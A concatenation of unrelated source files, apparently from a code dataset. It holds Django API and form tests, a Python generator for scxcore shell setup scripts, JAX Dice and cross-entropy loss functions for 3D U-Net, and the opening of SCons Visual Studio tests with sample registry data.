}
response = self.client.post(self.url_list, data)
assert response.status_code == 201, response.json()
assert response.data["name"] == data["name"]
def test_retrieve_systems(self):
system = baker.make(
System,
name=fake.name()[:127],
organisation=self.global_organisation,
)
response = self.client.get(self.url_list)
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
names = [a["name"] for a in response.data["results"]]
assert system.name in names
def test_patch_system(self):
system = baker.make(
System,
name=fake.name()[:127],
organisation=self.global_organisation,
)
edit_name = {"name": fake.name()[:127]}
url = reverse("api:system-detail", kwargs={"pk": system.pk})
response = self.client.patch(url, edit_name)
assert response.status_code == 200, response.json()
assert response.data["name"] == edit_name["name"]
def test_put_system(self):
system = baker.make(
System,
name=fake.name()[:127],
organisation=self.global_organisation,
)
data = {
"name": fake.name()[:127],
"description": fake.text(),
"organisation": self.global_organisation.pk,
}
url = reverse("api:system-detail", kwargs={"pk": system.pk})
response = self.client.put(url, data)
assert response.status_code == 200, response.json()
assert response.data["name"] == data["name"]
class SystemFormTest(LoggedInMixin, TestCase):
def test_create(self):
data = {
"name": fake.name()[:127],
"pattern": System.SystemPatters.HYBRID.value,
"description": fake.text(),
"organisation": self.global_organisation.pk,
}
response = self.client.post(reverse("common:system_create"), data=data)
self.assertEqual(
response.status_code,
302,
)
def test_update(self):
system = baker.make(
System,
name=fake.name()[:127],
organisation=self.global_organisation,
)
data = {
"pk": system.pk,
"name": fake.name()[:127],
"pattern": System.SystemPatters.POINT_OF_CARE.value,
"description": fake.text(),
"organisation": self.global_organisation.pk,
}
response = self.client.post(
reverse("common:system_update", kwargs={"pk": system.pk}), data=data
)
self.assertEqual(
response.status_code,
302,
)
def test_delete(self):
system = baker.make(
System,
name=fake.name()[:127],
organisation=self.global_organisation,
)
response = self.client.post(
reverse("common:system_delete", kwargs={"pk": system.pk}),
)
self.assertEqual(
response.status_code,
302,
)
class UserFacilityViewSetTest(LoggedInMixin, APITestCase):
def setUp(self):
super().setUp()
self.by_both = UserFacilityAllotment.AllotmentType.BY_FACILITY_AND_REGION
self.by_facility = UserFacilityAllotment.AllotmentType.BY_FACILITY
self.by_region = UserFacilityAllotment.AllotmentType.BY_REGION
self.facilities = baker.make(
Facility,
20,
is_fahari_facility=True,
county="Nairobi",
organisation=self.global_organisation,
)
def test_create(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
data = {
"allotment_type": self.by_facility.value,
"facilities": map(lambda f: f.pk, self.facilities),
"user": user.pk,
"organisation": self.global_organisation.pk,
}
response = self.client.post(reverse("api:userfacilityallotment-list"), data=data)
assert response.status_code == 201
def test_retrieve(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
instance: UserFacilityAllotment = baker.make(
UserFacilityAllotment,
allotment_type=self.by_facility.value,
facilities=self.facilities,
organisation=self.global_organisation,
user=user,
)
response = self.client.get(reverse("api:userfacilityallotment-list"))
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
allotments = [entry["id"] for entry in response.data["results"]]
assert str(instance.pk) in allotments
def test_patch(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
instance: UserFacilityAllotment = baker.make(
UserFacilityAllotment,
allotment_type=self.by_facility.value,
facilities=self.facilities,
organisation=self.global_organisation,
user=user,
)
data = {
"allotment_type": self.by_region.value,
"region_type": UserFacilityAllotment.RegionType.COUNTY.value,
"counties": ["Nairobi"],
}
response = self.client.patch(
reverse("api:userfacilityallotment-detail", kwargs={"pk": instance.pk}), data
)
assert response.status_code == 200, response.json()
assert response.data["allotment_type"] == data["allotment_type"]
assert response.data["region_type"] == data["region_type"]
assert response.data["counties"] == data["counties"]
def test_put(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
instance: UserFacilityAllotment = baker.make(
UserFacilityAllotment,
allotment_type=self.by_facility.value,
facilities=self.facilities,
organisation=self.global_organisation,
user=user,
)
data = {
"active": False,
"allotment_type": self.by_region.value,
"counties": ["Nairobi"],
"organisation": self.global_organisation.pk,
"region_type": UserFacilityAllotment.RegionType.COUNTY.value,
"user": user.pk,
}
response = self.client.put(
reverse("api:userfacilityallotment-detail", kwargs={"pk": instance.pk}), data
)
assert response.status_code == 200, response.json()
assert response.data["active"] == data["active"]
assert response.data["allotment_type"] == data["allotment_type"]
assert response.data["region_type"] == data["region_type"]
assert response.data["counties"] == data["counties"]
class UserFacilityAllotmentFormTest(LoggedInMixin, TestCase):
def setUp(self):
super().setUp()
self.by_both = UserFacilityAllotment.AllotmentType.BY_FACILITY_AND_REGION
self.by_facility = UserFacilityAllotment.AllotmentType.BY_FACILITY
self.by_region = UserFacilityAllotment.AllotmentType.BY_REGION
self.facilities = baker.make(
Facility,
20,
is_fahari_facility=True,
county="Nairobi",
organisation=self.global_organisation,
)
def test_create(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
data = {
"allotment_type": self.by_facility.value,
"facilities": map(lambda f: f.pk, self.facilities),
"user": user.pk,
"organisation": self.global_organisation.pk,
}
response = self.client.post(reverse("common:user_facility_allotment_create"), data=data)
self.assertEqual(
response.status_code,
302,
)
def test_update(self):
instance = self.user_facility_allotment
data = {
"pk": instance.pk,
"allotment_type": self.by_facility.value,
"facilities": map(lambda f: f.pk, self.facilities),
"user": self.user.pk,
"organisation": self.global_organisation.pk,
"active": False,
}
response = self.client.post(
reverse("common:user_facility_allotment_update", kwargs={"pk": instance.pk}), data=data
)
self.assertEqual(
response.status_code,
302,
)
def test_delete(self):
user = baker.make(get_user_model(), organisation=self.global_organisation)
instance: UserFacilityAllotment = baker.make(
UserFacilityAllotment,
allotment_type=self.by_facility.value,
facilities=self.facilities,
organisation=self.global_organisation,
user=user,
)
response = self.client.post(
reverse("common:user_facility_allotment_delete", kwargs={"pk": instance.pk}),
)
self.assertEqual(
response.status_code,
302,
)
|
<reponame>pigera/scxcore<filename>installer/generate_scxcore_scripts.py
import sys
import os
def Get_sh_path(PF):
if PF == "SunOS" or PF == "HPUX":
return '#!/usr/bin/sh'
else:
return '#!/bin/sh'
def GenerateSetupScriptFile():
shfile = open(os.path.join(outputDir, 'scx_setup.sh'), 'w')
shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n')
# Configure script to not complain if environment variable isn't currently set
shfile.write('set +u\n')
if Variables["PF"] == 'MacOS':
shfile.write('PATH=/usr/libexec/omi/bin:$PATH' + '\n')
else:
shfile.write('PATH=/opt/omi/bin:$PATH' + '\n')
shfile.write('export PATH' + '\n')
if Variables["PF"] == 'MacOS':
shfile.write('DYLD_LIBRARY_PATH=/usr/libexec/microsoft/scx/lib:$DYLD_LIBRARY_PATH' + '\n')
shfile.write('export DYLD_LIBRARY_PATH' + '\n')
elif Variables["PF"] == 'HPUX' and Variables["PFARCH"] == "pa-risc":
shfile.write('SHLIB_PATH=/opt/omi/lib:$SHLIB_PATH' + '\n')
shfile.write('export SHLIB_PATH' + '\n')
elif Variables["PF"] == "SunOS" and int(Variables["PFMAJOR"]) == 5 and int(Variables["PFMINOR"]) <= 9:
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:/usr/local/ssl/lib:/usr/local/lib:$LD_LIBRARY_PATH' + '\n')
shfile.write('export LD_LIBRARY_PATH' + '\n')
elif Variables["PF"] == "AIX":
shfile.write('LIBPATH=/opt/omi/lib:$LIBPATH\n')
shfile.write('export LIBPATH\n')
# Since AIX searches LIBPATH first, it is questionable whether we need to define LD_LIBRARY_PATH also, but
# in the interests of avoiding side effects of code that looks for it, we will set it here.
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
shfile.write('export LD_LIBRARY_PATH\n')
else:
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
shfile.write('export LD_LIBRARY_PATH' + '\n')
if Variables["BT"] == 'Bullseye':
shfile.write('COVFILE=/var/opt/microsoft/scx/log/OpsMgr.cov' + '\n')
shfile.write('export COVFILE' + '\n')
shfile.close()
def GenerateToolsSetupScriptFile():
shfile = open(os.path.join(outputDir, 'scx_setup_tools.sh'), 'w')
shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n')
# Configure script to not complain if environment variable isn't currently set
shfile.write('set +u\n')
if Variables["PF"] == 'MacOS':
shfile.write('PATH=/usr/libexec/omi/bin/tools:$PATH' + '\n')
else:
shfile.write('PATH=/opt/omi/bin:/opt/microsoft/scx/bin/tools:$PATH' + '\n')
shfile.write('export PATH' + '\n')
if Variables["PF"] == 'MacOS':
shfile.write('DYLD_LIBRARY_PATH=/usr/libexec/microsoft/scx/lib:$DYLD_LIBRARY_PATH' + '\n')
shfile.write('export DYLD_LIBRARY_PATH' + '\n')
elif Variables["PF"] == 'HPUX' and Variables["PFARCH"] == "pa-risc":
shfile.write('SHLIB_PATH=/opt/omi/lib:$SHLIB_PATH' + '\n')
shfile.write('export SHLIB_PATH' + '\n')
elif Variables["PF"] == "SunOS" and int(Variables["PFMAJOR"]) == 5 and int(Variables["PFMINOR"]) <= 9:
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:/usr/local/ssl/lib:/usr/local/lib:$LD_LIBRARY_PATH' + '\n')
shfile.write('export LD_LIBRARY_PATH' + '\n')
elif Variables["PF"] == 'AIX':
shfile.write('LIBPATH=/opt/omi/lib:$LIBPATH\n')
shfile.write('export LIBPATH' + '\n')
# Since AIX searches LIBPATH first, it is questionable whether we need to define LD_LIBRARY_PATH also, but
# in the interests of avoiding side effects of code that looks for it, we will set it here.
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
shfile.write('export LD_LIBRARY_PATH\n')
else:
shfile.write('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH' + '\n')
shfile.write('export LD_LIBRARY_PATH' + '\n')
if Variables["BT"] == 'Bullseye':
shfile.write('COVFILE=/var/opt/microsoft/scx/log/OpsMgr.cov' + '\n')
shfile.write('export COVFILE' + '\n')
shfile.close()
def GenerateAdminToolScriptFile():
shfile = open(os.path.join(outputDir, 'scxadmin.sh'), 'w')
shfile.write( Get_sh_path(Variables["PF"]) )
shfile.write( '\n\n' );
shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n\n')
if Variables["PF"] == 'MacOS':
scxpath = "/usr/libexec"
else:
scxpath = "/opt"
shfile.write('. ' + scxpath + '/microsoft/scx/bin/tools/setup.sh\n')
# On older (pre-systemd) systems, with non-latin locale set, scxadmin can get
# 'Exception: Multibyte string conversion failed' errors when trying to convert
# strings from SCXProcess::Run with output like:
#
# Shutting down Open Group OMI Server: [ <non-ASCII characters> ]
# Starting Open Group OMI Server: [ <non-ASCII characters> ]
#
# Just set the C locale (which exists on all systems) to resolve this issue.
shfile.write('LANG=C; export LANG\n')
shfile.write('exec ' + scxpath + '/microsoft/scx/bin/tools/.scxadmin "$@"\n')
shfile.close()
def GenerateSSLToolScriptFile():
shfile = open(os.path.join(outputDir, 'scxsslconfig.sh'), 'w')
shfile.write( Get_sh_path(Variables["PF"]) );
shfile.write( '\n\n' );
shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n\n')
if Variables["PF"] == 'MacOS':
scxpath = "/usr/libexec"
else:
scxpath = "/opt"
shfile.write('. ' + scxpath + '/microsoft/scx/bin/tools/setup.sh\n')
shfile.write('exec ' + scxpath + '/microsoft/scx/bin/tools/.scxsslconfig "$@"\n')
shfile.close()
def GenerateScripts():
GenerateSetupScriptFile()
GenerateToolsSetupScriptFile()
GenerateAdminToolScriptFile()
GenerateSSLToolScriptFile()
Variables = dict()
# Parse command line arguments
args = []
optlist = []
for arg in sys.argv[1:]:
if len(arg) < 2:
# Must be a file
args.append(arg)
continue
if arg[0:2] == "--":
tokens = arg[2:].split("=",1)
if len(tokens) == 1:
tokens.append("")
Variables[tokens[0]] = tokens[1]
else:
args.append(arg)
outputDir = Variables["OUTPUT_DIR"]
GenerateScripts()
|
<filename>Google/benchmarks/unet3d/implementations/unet3d-preview-JAX-tpu-v4-128/models/losses.py
"""JAX implementation of losses in 3DUnet.
https://github.com/mmarcinkiewicz/training/blob/Add_unet3d/image_segmentation/unet3d/model/losses.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import functools
from flax import nn
import jax
from jax import lax
import jax.numpy as jnp
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.models import losses_numpy
def cross_entropy_loss(logits: jnp.ndarray,
one_hot_labels: jnp.ndarray) -> jnp.ndarray:
"""Returns the cross entropy loss between some logits and some labels.
Args:
logits: Output of the model.
one_hot_labels: One-hot encoded labels. Dimensions should match the logits.
Returns:
The cross entropy, averaged over the first dimension (samples).
"""
log_softmax_logits = jax.nn.log_softmax(logits)
loss = -jnp.sum(one_hot_labels * log_softmax_logits, axis=-1)
return jnp.mean(loss)
class Dice(nn.Module):
"""Dice class."""
def apply(self,
prediction,
target,
to_onehot_y=True,
to_onehot_x=False,
use_softmax=True,
use_argmax=False,
include_background=False,
layout="NDHWC"):
smooth_nr = 1e-6
smooth_dr = 1e-6
if layout == "NCDHW":
channel_axis = 1
reduce_axis = tuple(list(range(2, len(prediction.shape))))
else:
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
num_pred_ch = prediction.shape[channel_axis]
if use_softmax:
prediction = jax.nn.softmax(prediction, axis=channel_axis)
elif use_argmax:
prediction = jnp.argmax(prediction, axis=channel_axis)
if to_onehot_y:
target = to_one_hot(target, layout, channel_axis)
if to_onehot_x:
prediction = to_one_hot(prediction, layout, channel_axis)
if not include_background:
assert num_pred_ch > 1, \
(f"To exclude background the prediction needs more than one channel. "
f"Got {num_pred_ch}.")
if layout == "NCDHW":
target = target[:, 1:]
prediction = prediction[:, 1:]
else:
target = target[..., 1:]
prediction = prediction[..., 1:]
assert (target.shape == prediction.shape), \
(f"Target and prediction shape do not match. Target: ({target.shape}), "
f"prediction: ({prediction.shape}).")
intersection = jnp.sum(target * prediction, axis=reduce_axis)
target_sum = jnp.sum(target, axis=reduce_axis)
prediction_sum = jnp.sum(prediction, axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
def to_one_hot(array, layout, channel_axis):
if len(array.shape) >= 5:
array = jnp.squeeze(array, axis=channel_axis)
array = jax.nn.one_hot(
lax.convert_element_type(array, jnp.int32),
num_classes=3,
dtype=jnp.float32)
if layout == "NCDHW":
array = jnp.transpose(array, (0, 4, 1, 2, 3))
return array
class DiceCELoss(nn.Module):
"""DiceCELoss class."""
def apply(self, y_pred, y_true, to_onehot_y, use_softmax, layout,
include_background=False):
dice_fn = Dice.partial(to_onehot_y=to_onehot_y, use_softmax=use_softmax,
include_background=include_background)
dice = 1.0 - jnp.mean(dice_fn(y_pred, y_true))
if layout == "NCDHW":
channel_axis = 1
else:
channel_axis = -1
cross_entropy = cross_entropy_loss(y_pred,
to_one_hot(y_true, layout, channel_axis))
return (dice + cross_entropy) / 2
class DiceScore(nn.Module):
"""DiceScore class."""
def apply(self,
y_pred,
y_true,
to_onehot_y=True,
use_argmax=True,
layout="NDHWC",
include_background=False,
compute_mean_score=True):
dice_fn = Dice.partial(
to_onehot_y=to_onehot_y,
to_onehot_x=True,
use_softmax=False,
use_argmax=use_argmax,
layout=layout,
include_background=include_background)
dice_scores = dice_fn(y_pred, y_true)
if compute_mean_score:
return jnp.mean(dice_scores, axis=0)
else:
return dice_scores
def get_loss_fn(key, params, for_cpu=False, compute_mean_dice_score=True):
"""Get Unet DiceLoss and DiceScore fns.
Args:
key: random.PRNGKey(seed)
params: Config parameter dictionary.
for_cpu: If true, returns numpy implementation of the loss_fn and score_fn.
compute_mean_dice_score: Whether to compute the mean scores or not for
images.
Returns:
dice_loss_fn: dice loss fn.
dice_score_fn: dice score fn.
"""
layout = params["layout"]
include_background = params["include_background"]
dtype = params["dtype"]
n_class = params["n_class"]
device_batch_size = params["device_batch_size"]
train_data_shape = params["input_shape"][:-1]
input_shape = (device_batch_size, *train_data_shape, n_class)
label_shape = (device_batch_size, *train_data_shape)
if for_cpu:
dice_loss_fn = functools.partial(
losses_numpy.compute_dice_ce_loss,
to_onehot_y=True,
use_softmax=True,
layout=layout,
include_background=include_background)
dice_score_fn = functools.partial(
losses_numpy.compute_dice_score,
to_onehot_y=True,
use_argmax=True,
layout=layout,
include_background=include_background,
compute_mean_score=compute_mean_dice_score)
else:
dice_loss_def = DiceCELoss.partial(
to_onehot_y=True,
use_softmax=True,
layout=layout,
include_background=include_background)
_, dice_loss_fn = dice_loss_def.create_by_shape(key,
[(input_shape, dtype),
(label_shape, jnp.int32)])
dice_score_def = DiceScore.partial(
to_onehot_y=True,
use_argmax=True,
layout=layout,
include_background=include_background,
compute_mean_score=compute_mean_dice_score)
_, dice_score_fn = dice_score_def.create_by_shape(key,
[(input_shape, dtype),
(label_shape, dtype)])
return dice_loss_fn, dice_score_fn
def dice_score_withoout_background(prediction, target):
"""This is the special case of DiceScore where prediction has C - 1 channels.
This is to reduce some memory usage from storing the global results. Each
entry in the prediction now has C - 1 channels whee,
new_prediction[..., :i] = old[..., :i + 1] - old[..., :0]
So, when we check for argmax, we also check for max value, if less than 0,
this means that it is background.
Args:
prediction: 5D numpy array. [Image, H, W, D, C - 1].
target: 4D [Image, H, W, D], or 5D [Image, H, W, D, C, 1] target classes
array.
Returns:
Dice score per image, [B]. Does not computes mean unlike others.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
# to reduce memory class scores are shrinked from 3 elements to 2 elements.
# newscore[1] = oldscore[2] - old_score[0]
# newscore[0] = oldscore[1] - old_score[0]
# If max value is less than 0, this means that background has the max value.
is_not_background = (jnp.max(prediction, axis=-1) > 0).astype(jnp.int8)
# arg max will simply return 0, 1, 2. int8 is okay to use.
prediction = jax.lax.argmax(prediction,
len(prediction.shape) + channel_axis,
jnp.int8)
prediction = (prediction + 1) * is_not_background
if len(prediction.shape) >= 5:
prediction = jnp.squeeze(prediction, axis=channel_axis)
# One hot will also return only 0 or 1, so int8 is okay.
prediction = jax.nn.one_hot(
jax.lax.convert_element_type(prediction, jnp.int8),
num_classes=3,
dtype=jnp.int8)
prediction = prediction[..., 1:]
if len(target.shape) >= 5:
target = jnp.squeeze(target, axis=channel_axis)
# As above, int8 is okay for one hot.
target = jax.nn.one_hot(
jax.lax.convert_element_type(target, jnp.int8),
num_classes=3,
dtype=jnp.int8)
target = target[..., 1:]
intersection = jnp.sum((target * prediction).astype(jnp.float32),
axis=reduce_axis)
target_sum = jnp.sum(target.astype(jnp.float32), axis=reduce_axis)
prediction_sum = jnp.sum(prediction.astype(jnp.float32), axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
def dice_score(prediction, target):
"""This is the special case of DiceScore from losses.py, separated for simplicity.
Args:
prediction: 5D numpy array. [Image, H, W, D, C].
target: 4D [Image, H, W, D], or 5D [Image, H, W, D, C, 1] target classes
array.
Returns:
Dice score per image, [B]. Does not computes mean unlike others.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
# arg max will simply return 0, 1, 2. int8 is okay to use.
prediction = jax.lax.argmax(prediction,
len(prediction.shape) + channel_axis,
jnp.int8)
if len(prediction.shape) >= 5:
prediction = jnp.squeeze(prediction, axis=channel_axis)
# One hot will also return only 0 or 1, so int8 is okay.
prediction = jax.nn.one_hot(
jax.lax.convert_element_type(prediction, jnp.int8),
num_classes=3,
dtype=jnp.int8)
prediction = prediction[..., 1:]
if len(target.shape) >= 5:
target = jnp.squeeze(target, axis=channel_axis)
# As above, int8 is okay for one hot.
target = jax.nn.one_hot(
jax.lax.convert_element_type(target, jnp.int8),
num_classes=3,
dtype=jnp.int8)
target = target[..., 1:]
intersection = jnp.sum((target * prediction).astype(jnp.float32),
axis=reduce_axis)
target_sum = jnp.sum(target.astype(jnp.float32), axis=reduce_axis)
prediction_sum = jnp.sum(prediction.astype(jnp.float32), axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
|
<filename>src/engine/SCons/Tool/msvsTests.py
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import string
import sys
import TestCmd
import unittest
from SCons.Tool.msvs import *
import SCons.Util
import SCons.Warnings
regdata_6a = string.split(r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\ServicePacks]
"sp3"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup]
"VsCommonDir"="C:\Program Files\Microsoft Visual Studio\Common"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Developer Network Library - Visual Studio 6.0a]
"ProductDir"="C:\Program Files\Microsoft Visual Studio\MSDN98\98VSa\1033"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++]
"ProductDir"="C:\Program Files\Microsoft Visual Studio\VC98"
''','\n')
regdata_6b = string.split(r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0]
"InstallDir"="C:\VS6\Common\IDE\IDE98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\ServicePacks]
"sp5"=""
"latest"=dword:00000005
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup]
"VsCommonDir"="C:\VS6\Common"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual Basic]
"ProductDir"="C:\VS6\VB98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++]
"ProductDir"="C:\VS6\VC98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual Studio]
"ProductDir"="C:\VS6"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft VSEE Client]
"ProductDir"="C:\VS6\Common\Tools"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Visual Studio 98]
''','\n')
regdata_7 = string.split(r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0]
"InstallDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"Source Directories"="C:\Program Files\Microsoft Visual Studio .NET\Vc7\crt\;C:\Program Files\Microsoft Visual Studio .NET\Vc7\atlmfc\src\mfc\;C:\Program Files\Microsoft Visual Studio .NET\Vc7\atlmfc\src\atl\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\CrystalReports]
@="#15007"
"Package"="{F05E92C6-8346-11D3-B4AD-00A0C9B04E7B}"
"ProductDetails"="#15009"
"LogoID"="0"
"PID"="#15008"
"UseInterface"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\Visual Basic.NET]
@=""
"DefaultProductAttribute"="VB"
"Package"="{164B10B9-B200-11D0-8C61-00A0C91E29D5}"
"UseInterface"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\Visual C#]
@=""
"Package"="{FAE04EC1-301F-11d3-BF4B-00C04F79EFBC}"
"UseInterface"=dword:00000001
"DefaultProductAttribute"="C#"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\VisualC++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup]
"Dbghelp_path"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"dw_dir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\MSDN]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Msdn\1033\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\Servicing\SKU]
"Visual Studio .NET Professional - English"="{D0610409-7D65-11D5-A54F-0090278A1BB8}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VB]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Vc7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VC#]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\Visual Studio .NET Professional - English]
"InstallSuccess"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS]
"EnvironmentDirectory"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"EnvironmentPath"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\devenv.exe"
"VS7EnvironmentLocation"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\devenv.exe"
"MSMDir"="C:\Program Files\Common Files\Merge Modules\"
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\"
"VS7CommonBinDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\Tools\"
"VS7CommonDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\"
"VSUpdateDir"="C:\Program Files\Microsoft Visual Studio .NET\Setup\VSUpdate\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS\BuildNumber]
"1033"="7.0.9466"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS\Pro]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{A54AAE91-30C2-11D3-87BF-A04A4CC10000}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32\Directories]
"Path Dirs"="$(VCInstallDir)bin;$(VSInstallDir)Common7\Tools\bin\prerelease;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;C:\Program Files\HTML Help Workshop\;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);C:\perl\bin;C:\cygwin\bin;c:\cygwin\usr\bin;C:\bin;C:\program files\perforce;C:\cygwin\usr\local\bin\i686-pc-cygwin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem"
"Library Dirs"="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)PlatformSDK\lib\prerelease;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib"
"Include Dirs"="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include\prerelease;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include"
"Source Dirs"="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src"
"Reference Dirs"=""
''','\n')
regdata_7_1 = string.split(r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1]
@=""
"Source Directories"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\crt\src\;C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\atlmfc\src\mfc\;C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\atlmfc\src\atl\"
"ThisVersionSolutionCLSID"="{246C57AE-40DD-4d6b-9E8D-B0F5757BB2A8}"
"ThisVersionDTECLSID"="{8CD2DD97-4EC1-4bc4-9359-89A3EEDD57A6}"
